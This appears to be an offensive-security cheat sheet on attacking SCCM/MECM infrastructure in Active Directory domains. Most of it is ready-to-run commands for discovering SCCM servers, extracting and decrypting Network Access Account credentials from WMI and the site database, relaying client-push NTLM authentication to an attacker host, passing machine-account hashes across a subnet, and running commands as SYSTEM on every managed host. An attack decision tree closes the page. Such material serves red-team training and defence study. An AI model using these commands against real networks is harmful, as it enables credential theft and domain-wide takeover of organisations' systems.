KagisoSec_
AD Attacks
AD ATTACKS

SCCM / MECM Attacks

SCCM (System Center Configuration Manager / MECM) attack surface in AD: hierarchy discovery, NAA credential extraction via WMI, client push NTLM relay, SCCM admin to domain-wide RCE, site database MSSQL access, SharpSCCM and SCCMHunter tooling.

active-directory sccm mecm configmgr sharpsccm sccmhunter naa

SCCM manages Windows deployments across the entire domain. Compromise the SCCM infrastructure and you get SYSTEM-level code execution on every managed workstation. The main attack paths: extract NAA credentials from a managed client, relay client push authentication, or become an SCCM admin and deploy malicious packages.

Discovery

# AD — find SCCM servers by SPN or hostname
Get-DomainComputer | Where { $_.dnshostname -match "sccm|mecm|configmgr|cm" }
Get-DomainComputer -SPN "SMS*" | select dnshostname, serviceprincipalname

# AD System Management container (where site server registers itself)
Get-DomainObject -SearchBase "CN=System Management,CN=System,DC=corp,DC=local"

# From a managed client
SharpSCCM.exe local sms-provider
SharpSCCM.exe local site-info
# Network sweep
nmap -p 80,443,8005 10.10.10.0/24 --open
nxc smb 10.10.10.0/24 | grep -i "sccm\|mecm\|configmgr"
# SCCMHunter — automated discovery
python3 sccmhunter.py find -u user -p pass -d corp.local -dc DC_IP

Network Access Account (NAA) Credential Extraction

SCCM uses a Network Access Account (NAA) to download content from distribution points. The NAA’s encrypted credentials are stored on every managed client in WMI — readable by local admins.

# SharpSCCM — extract NAA from WMI
SharpSCCM.exe local naa

# Manual WMI query
Get-WmiObject -Namespace root\ccm\policy\Machine\RequestedConfig -Class CCM_NetworkAccessAccount

# CIM version
Get-CimInstance -Namespace root\ccm\policy\Machine\RequestedConfig -ClassName CCM_NetworkAccessAccount

Output is base64/hex-encoded. Decrypt via DPAPI:

# DPAPI decrypt (on the same machine, as SYSTEM or the service account)
$encrypted = 'hex_encoded_credential'
$bytes = [System.Convert]::FromHexString($encrypted)
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, 'LocalMachine')
[System.Text.Encoding]::UTF8.GetString($decrypted)
# SharpSCCM (also pulls push install account)
SharpSCCM.exe get naa
SharpSCCM.exe get accounts

Client Push Install → NTLM Relay

When SCCM pushes the agent to a new client, the site server authenticates to the target over SMB. Trigger a push to your attacker IP → capture and relay the site server’s NTLM hash.

# Terminal 1: ntlmrelayx targeting LDAP (for DCSync or computer account)
ntlmrelayx.py -t ldap://DC_IP --add-computer EVILPC --computer-password 'EvilPass123!'

# Terminal 2: trigger push install targeting attacker IP
SharpSCCM.exe invoke admin-service \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -uc attacker@corp.local \
  -pc ATTACKER_IP

# The site server connects back to ATTACKER_IP:445 → ntlmrelayx relays the push account hash

After relay: use the computer account for RBCD attack or grant yourself DCSync rights.

SCCM Admin → Mass Domain RCE

If you obtain SCCM administrator credentials (or relayed session), deploy a malicious application/package to all managed hosts.

# SharpSCCM — execute command on all managed hosts
SharpSCCM.exe exec \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -p "cmd.exe /c whoami > C:\Temp\pwned.txt" \
  -d "All Systems"

# PowerShell payload
SharpSCCM.exe exec \
  -sms SCCM_SERVER \
  -sc SITE_CODE \
  -p "powershell -enc BASE64_PAYLOAD"

# Target specific collection
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITE_CODE -p "cmd /c ..." -t "All Workstations"

This executes as SYSTEM on every machine in the collection — domain-wide RCE.

Site Server → Local Admin on Clients

The SCCM site server machine account has local admin on all managed clients (installed during push). Once you have the site server machine account hash:

# PTH to all managed clients
nxc smb 10.10.10.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASH --local-auth
nxc smb 10.10.10.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASH --sam

SCCM Database (MSSQL)

The SCCM site database stores inventory, client data, credentials, and package configs. It’s a standard MSSQL instance:

# Connect to SCCM DB
mssqlclient.py -windows-auth corp.local/admin:pass@SCCM_SQL_SERVER

# Query managed computers
SQL> SELECT Name, LastLogon00, IPAddress0 FROM CM_SC1.dbo.v_R_System;

# Query NAA credentials stored in DB
SQL> SELECT UserName, Password FROM CM_SC1.dbo.vSMS_SC_SiteDefinition_Property WHERE PropertyName LIKE 'NAA%';

# Find site codes
SQL> SELECT SiteCode, SiteName FROM CM_SC1.dbo.v_SiteSystemSummarizer;

SCCMHunter — Full Attack Workflow

# Discovery
python3 sccmhunter.py find -u user -p pass -d corp.local -dc DC_IP

# Check permissions
python3 sccmhunter.py check admin -u user -p pass -d corp.local

# Extract NAA credentials via HTTP
python3 sccmhunter.py http -u user -p pass -d corp.local -t SCCM_SERVER

# Enumerate collections
python3 sccmhunter.py admin -u admin -p pass -d corp.local -t SCCM_SERVER --get-collections

SharpSCCM — Quick Reference

# Enumerate
SharpSCCM.exe local sms-provider        # find local MP
SharpSCCM.exe local site-info           # site code, version
SharpSCCM.exe get sites                 # all sites
SharpSCCM.exe get collections           # target collections
SharpSCCM.exe get naa                   # NAA creds
SharpSCCM.exe get accounts              # all stored accounts

# Attack
SharpSCCM.exe local naa                 # WMI NAA extraction
SharpSCCM.exe exec -sms SERVER -sc CODE -p "cmd" -d "All Systems"  # mass RCE
SharpSCCM.exe invoke admin-service ...  # trigger push install for relay

Attack Decision Flow

SCCM present in environment?
├── You have local admin on any managed client?
│   └── YES → SharpSCCM local naa → domain credentials

├── You have low-priv domain creds?
│   └── Check MAQ → create computer → trigger push → NTLM relay

├── You have SCCM admin?
│   └── exec → all systems → SYSTEM everywhere

└── You have DC/DA already?
    └── Extract NAA from any client via WMI or SCCM DB